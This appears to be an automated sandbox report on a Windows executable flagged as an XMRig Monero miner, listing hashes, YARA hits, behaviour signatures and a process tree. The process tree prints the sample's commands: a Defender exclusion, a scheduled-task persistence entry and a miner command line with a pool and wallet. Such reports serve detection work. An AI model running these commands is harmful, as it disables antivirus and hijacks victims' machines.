Analysis
-
max time kernel
90s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
06-01-2023 18:24
Static task
static1
General
-
Target
69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe
-
Size
834KB
-
MD5
51fab718bb14209c2c812b25ce71b53e
-
SHA1
305bb39cf29d7e8fb2614f15c73e1a77d8684b88
-
SHA256
69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379
-
SHA512
da9269709b223948cd60a2fd107f5934cb2fdf224901fbd1d354d807bd1a40361a89045177fc70c90d1860805dc524e733bd00f062cb26f03caff65e600a7400
-
SSDEEP
24576:9xeYvng/hotknt6PxjAYaQkDwtfBPmPqh0UVm:D7vng/hFCf7kkbmPM0UVm
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/2532-159-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2532-160-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/2532-161-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2532-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2532-164-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2532-166-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4728 set thread context of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3792 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4904 powershell.exe 4904 powershell.exe 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeLockMemoryPrivilege 2532 vbc.exe Token: SeLockMemoryPrivilege 2532 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2532 vbc.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4728 wrote to memory of 4904 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 82 PID 4728 wrote to memory of 4904 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 82 PID 4728 wrote to memory of 1444 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 84 PID 4728 wrote to memory of 1444 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 84 PID 1444 wrote to memory of 3792 1444 cmd.exe 86 PID 1444 wrote to memory of 3792 1444 cmd.exe 86 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94 PID 4728 wrote to memory of 2532 4728 69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe"C:\Users\Admin\AppData\Local\Temp\69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "VANOZ" /tr "C:\ProgramData\Explorer\VANOZ.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "VANOZ" /tr "C:\ProgramData\Explorer\VANOZ.exe"3⤵
- Creates scheduled task(s)
PID:3792
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2532
-